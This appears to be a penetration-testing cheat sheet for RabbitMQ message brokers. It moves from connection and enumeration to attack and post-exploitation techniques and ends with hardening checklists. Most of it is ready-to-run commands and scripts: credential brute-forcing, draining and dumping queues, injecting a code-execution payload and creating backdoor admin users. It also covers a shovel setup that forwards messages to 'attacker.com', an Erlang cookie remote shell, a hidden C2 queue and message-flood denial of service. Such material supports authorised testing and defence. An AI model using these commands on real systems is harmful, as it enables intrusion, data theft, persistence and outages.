RabbitMQ
Default Ports: 5672 (AMQP), 15672 (Management UI), 25672 (Clustering)
RabbitMQ is an open-source message broker software that implements the Advanced Message Queuing Protocol (AMQP). It facilitates communication between distributed applications by routing and queuing messages. RabbitMQ is widely used in microservices architectures and can expose sensitive data if misconfigured.
Connect
Using Web Management Interface
# Access management UI
http://target.com:15672
https://target.com:15672
# Default credentials
guest:guest (only works on localhost by default)
# Login with credentials
Username: admin
Password: password
Using rabbitmqadmin CLI
# Install rabbitmqadmin
wget http://target.com:15672/cli/rabbitmqadmin
chmod +x rabbitmqadmin
# List queues
./rabbitmqadmin -H target.com -u admin -p password list queues
# List exchanges
./rabbitmqadmin -H target.com -u admin -p password list exchanges
# List bindings
./rabbitmqadmin -H target.com -u admin -p password list bindings
# Get messages
./rabbitmqadmin -H target.com -u admin -p password get queue=queue_name
Using Python (pika library)
import pika
# Connect to RabbitMQ
credentials = pika.PlainCredentials('admin', 'password')
parameters = pika.ConnectionParameters(
'target.com',
5672,
'/',
credentials
)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
# Declare queue
channel.queue_declare(queue='test')
# Publish message
channel.basic_publish(exchange='', routing_key='test', body='Hello')
# Consume message
method, properties, body = channel.basic_get(queue='test')
print(body)
connection.close()
Recon
Service Detection with Nmap
Use Nmap to detect RabbitMQ services and identify server capabilities.
nmap -p 5672,15672,25672 target.com
Banner Grabbing
Connect to RabbitMQ services to gather version and service information.
# Management API
curl http://target.com:15672/api/
# Get cluster name
curl -u guest:guest http://target.com:15672/api/cluster-name
# Get overview
curl -u guest:guest http://target.com:15672/api/overview
# Check if authentication is required
curl http://target.com:15672/api/whoami
Version Detection
Extract RabbitMQ version information from various sources.
# Get version from management API
curl -u admin:password http://target.com:15672/api/overview | jq .rabbitmq_version
# From login page
curl -s http://target.com:15672/ | grep -i "rabbitmq"
# From error pages
curl http://target.com:15672/nonexistent
Enumeration
User Enumeration
Discover RabbitMQ users and their permissions.
# List users (requires admin)
curl -u admin:password http://target.com:15672/api/users
# Get current user
curl -u admin:password http://target.com:15672/api/whoami
# User permissions
curl -u admin:password http://target.com:15672/api/users/username/permissions
# Using rabbitmqadmin
./rabbitmqadmin -H target.com -u admin -p password list users
Queue Enumeration
Explore RabbitMQ queues and their contents.
# List all queues
curl -u admin:password http://target.com:15672/api/queues
# Queue details
curl -u admin:password http://target.com:15672/api/queues/%2F/queue_name
# Messages in queue
curl -u admin:password http://target.com:15672/api/queues/%2F/queue_name/get \
-X POST -d '{"count":10,"ackmode":"ack_requeue_false","encoding":"auto"}'
# Using rabbitmqadmin
./rabbitmqadmin -H target.com -u admin -p password list queues \
name messages consumers
Exchange Enumeration
Discover RabbitMQ exchanges and their bindings.
# List exchanges
curl -u admin:password http://target.com:15672/api/exchanges
# Exchange details
curl -u admin:password http://target.com:15672/api/exchanges/%2F/amq.direct
# Bindings
curl -u admin:password http://target.com:15672/api/bindings
# Using rabbitmqadmin
./rabbitmqadmin -H target.com -u admin -p password list exchanges
Virtual Host Enumeration
Discover RabbitMQ virtual hosts and their configurations.
# List vhosts
curl -u admin:password http://target.com:15672/api/vhosts
# Vhost permissions
curl -u admin:password http://target.com:15672/api/vhosts/%2F/permissions
# Using rabbitmqadmin
./rabbitmqadmin -H target.com -u admin -p password list vhosts
Connection and Channel Info
Monitor active connections and channels.
# Active connections
curl -u admin:password http://target.com:15672/api/connections
# Active channels
curl -u admin:password http://target.com:15672/api/channels
# Consumers
curl -u admin:password http://target.com:15672/api/consumers
# Using rabbitmqadmin
./rabbitmqadmin -H target.com -u admin -p password list connections
./rabbitmqadmin -H target.com -u admin -p password list channels
Attack Vectors
Default Credentials
RabbitMQ installations often retain default credentials for system accounts.
# Common default credentials
guest:guest # Only works on localhost by default
admin:admin
administrator:administrator
user:user
test:test
# Try with curl
curl -u guest:guest http://target.com:15672/api/overview
# Check if guest account is enabled
curl -u guest:guest http://target.com:15672/api/whoami
Brute Force Attack
Brute forcing RabbitMQ management interface can reveal weak credentials.
Using Hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
target.com http-get /api/whoami:15672
Using Burp Suite Intruder
# Capture request to /api/whoami
# Send to Intruder
# Set Authorization header as payload position
Using Custom Script
for pass in $(cat passwords.txt); do
response=$(curl -s -u admin:$pass http://target.com:15672/api/whoami)
if [[ $response != *"401"* ]]; then
echo "[+] Found: admin:$pass"
break
fi
done
Message Interception
Intercept and consume messages from RabbitMQ queues.
# List queues and get messages
curl -u admin:password http://target.com:15672/api/queues
# Get messages from specific queue
curl -u admin:password http://target.com:15672/api/queues/%2F/orders/get \
-X POST \
-H "Content-Type: application/json" \
-d '{"count":100,"ackmode":"ack_requeue_true","encoding":"auto"}'
# Consume all messages
python3 << 'EOF'
import pika
import json
credentials = pika.PlainCredentials('admin', 'password')
connection = pika.BlockingConnection(
pika.ConnectionParameters('target.com', 5672, '/', credentials)
)
channel = connection.channel()
def callback(ch, method, properties, body):
print(f"Message: {body}")
with open('messages.txt', 'a') as f:
f.write(body.decode() + '\n')
channel.basic_consume(queue='queue_name', on_message_callback=callback, auto_ack=True)
channel.start_consuming()
EOF
Message Injection
Inject malicious messages into RabbitMQ queues.
# Publish malicious message to queue
curl -u admin:password http://target.com:15672/api/exchanges/%2F/amq.default/publish \
-X POST \
-H "Content-Type: application/json" \
-d '{
"properties":{},
"routing_key":"target_queue",
"payload":"malicious_payload",
"payload_encoding":"string"
}'
# Using Python
import pika
credentials = pika.PlainCredentials('admin', 'password')
connection = pika.BlockingConnection(
pika.ConnectionParameters('target.com', 5672, '/', credentials)
)
channel = connection.channel()
# Inject code execution payload (if consumer processes unsafely)
payload = '{"cmd":"__import__(\'os\').system(\'whoami\')"}'
channel.basic_publish(exchange='', routing_key='tasks', body=payload)
User Creation and Privilege Escalation
Create new users and escalate privileges in RabbitMQ.
# Create new admin user
curl -u admin:password http://target.com:15672/api/users/backdoor \
-X PUT \
-H "Content-Type: application/json" \
-d '{"password":"P@ssw0rd123!","tags":"administrator"}'
# Set permissions
curl -u admin:password http://target.com:15672/api/permissions/%2F/backdoor \
-X PUT \
-H "Content-Type: application/json" \
-d '{"configure":".*","write":".*","read":".*"}'
# Using rabbitmqadmin
./rabbitmqadmin -H target.com -u admin -p password declare user \
name=backdoor password=P@ssw0rd123! tags=administrator
Shovel Plugin Abuse
Exploit RabbitMQ Shovel plugin for message forwarding.
# If shovel plugin is enabled, can forward messages
curl -u admin:password http://target.com:15672/api/parameters/shovel/%2F/my-shovel \
-X PUT \
-H "Content-Type: application/json" \
-d '{
"value": {
"src-uri": "amqp://target.com",
"src-queue": "source_queue",
"dest-uri": "amqp://attacker.com",
"dest-queue": "stolen_messages"
}
}'
# All messages from source_queue will be forwarded to attacker's RabbitMQ
Erlang Cookie Exploitation
Exploit Erlang cookie for direct node access.
# If Erlang cookie is known or found
# Cookie located at: ~/.erlang.cookie or /var/lib/rabbitmq/.erlang.cookie
# Connect to Erlang node
erl -name attacker@attacker-host -setcookie COOKIE -remsh rabbit@target-host
# Execute Erlang commands
# List users
rabbit_auth_backend_internal:list_users().
# Add user
rabbit_auth_backend_internal:add_user(<<"backdoor">>, <<"password">>).
# Set admin tag
rabbit_auth_backend_internal:set_tags(<<"backdoor">>, [administrator]).
Post-Exploitation
Data Exfiltration
Extract sensitive data from RabbitMQ systems.
# Export all queues and messages
for queue in $(curl -s -u admin:password http://target.com:15672/api/queues | jq -r '.[].name'); do
echo "[+] Dumping queue: $queue"
curl -u admin:password http://target.com:15672/api/queues/%2F/$queue/get \
-X POST \
-d '{"count":1000,"ackmode":"ack_requeue_true","encoding":"auto"}' \
> ${queue}_messages.json
done
# Export configuration
curl -u admin:password http://target.com:15672/api/definitions > rabbitmq_config.json
# Export users and permissions
curl -u admin:password http://target.com:15672/api/users > users.json
curl -u admin:password http://target.com:15672/api/permissions > permissions.json
Persistence
Create persistent backdoor access to RabbitMQ systems.
# Create backdoor user with admin privileges
curl -u admin:password http://target.com:15672/api/users/system-monitor \
-X PUT \
-d '{"password":"ComplexP@ss123!","tags":"administrator"}'
# Set full permissions
curl -u admin:password http://target.com:15672/api/permissions/%2F/system-monitor \
-X PUT \
-d '{"configure":".*","write":".*","read":".*"}'
# Create hidden queue for C2
curl -u admin:password http://target.com:15672/api/queues/%2F/.system \
-X PUT \
-d '{"durable":true}'
Message Manipulation
Modify messages in RabbitMQ queues for malicious purposes.
# Modify messages in queue (requires draining and republishing)
# Get messages
messages=$(curl -u admin:password http://target.com:15672/api/queues/%2F/orders/get \
-X POST -d '{"count":100,"ackmode":"ack_requeue_false","encoding":"auto"}')
# Modify and republish
echo "$messages" | jq -c '.[]' | while read msg; do
# Modify message (e.g., change prices, quantities, etc.)
modified=$(echo "$msg" | jq '.payload = "modified_payload"')
# Republish
curl -u admin:password http://target.com:15672/api/exchanges/%2F/amq.default/publish \
-X POST -d "$modified"
done
Denial of Service
Perform denial of service attacks against RabbitMQ systems.
# Flood queue with messages
for i in {1..100000}; do
curl -u admin:password http://target.com:15672/api/exchanges/%2F/amq.default/publish \
-X POST \
-d "{\"routing_key\":\"target_queue\",\"payload\":\"DoS_$i\",\"payload_encoding\":\"string\"}"
done
# Create resource-intensive bindings
for i in {1..1000}; do
curl -u admin:password http://target.com:15672/api/bindings/%2F/e/exchange/q/queue \
-X POST -d "{\"routing_key\":\"key_$i\"}"
done
# Exhaust disk space with persistent messages
curl -u admin:password http://target.com:15672/api/queues/%2F/disk-filler \
-X PUT -d '{"durable":true}'
Common RabbitMQ API Endpoints
| Endpoint | Method | Description | Auth Required |
|---|---|---|---|
/api/overview | GET | Server overview | Yes |
/api/whoami | GET | Current user info | Yes |
/api/users | GET | List users | Admin |
/api/queues | GET | List queues | Yes |
/api/exchanges | GET | List exchanges | Yes |
/api/bindings | GET | List bindings | Yes |
/api/vhosts | GET | List virtual hosts | Yes |
/api/connections | GET | List connections | Admin |
/api/definitions | GET | Export configuration | Admin |
Useful Tools
| Tool | Description | Primary Use Case |
|---|---|---|
| rabbitmqadmin | Official CLI tool | Management and automation |
| pika | Python AMQP library | Programmatic access |
| curl | HTTP client | API interaction |
| Burp Suite | Web proxy | API testing |
| Nmap | Network scanner | Service detection |
| Metasploit | Exploitation framework | Automated testing |
Security Misconfigurations to Test
- ❌ Default credentials (guest:guest)
- ❌ Weak admin passwords
- ❌ Management interface exposed to internet
- ❌ No TLS/SSL encryption
- ❌ Guest account enabled remotely
- ❌ Overly permissive user permissions
- ❌ No authentication on AMQP port (5672)
- ❌ Erlang cookie exposed or weak
- ❌ Shovel/Federation plugins misconfigured
- ❌ No rate limiting on message publishing
- ❌ Sensitive data in messages
- ❌ No message encryption
- ❌ Verbose error messages
- ❌ Outdated RabbitMQ version
Message Queue Security Best Practices
- ✅ Change default credentials
- ✅ Use strong passwords for all users
- ✅ Implement TLS/SSL encryption
- ✅ Disable guest account for remote access
- ✅ Use principle of least privilege
- ✅ Enable authentication on all ports
- ✅ Protect Erlang cookie
- ✅ Regularly update RabbitMQ
- ✅ Implement message encryption
- ✅ Monitor and log access
- ✅ Use virtual hosts for isolation
- ✅ Implement rate limiting
- ✅ Validate and sanitize message content
- ✅ Restrict management interface access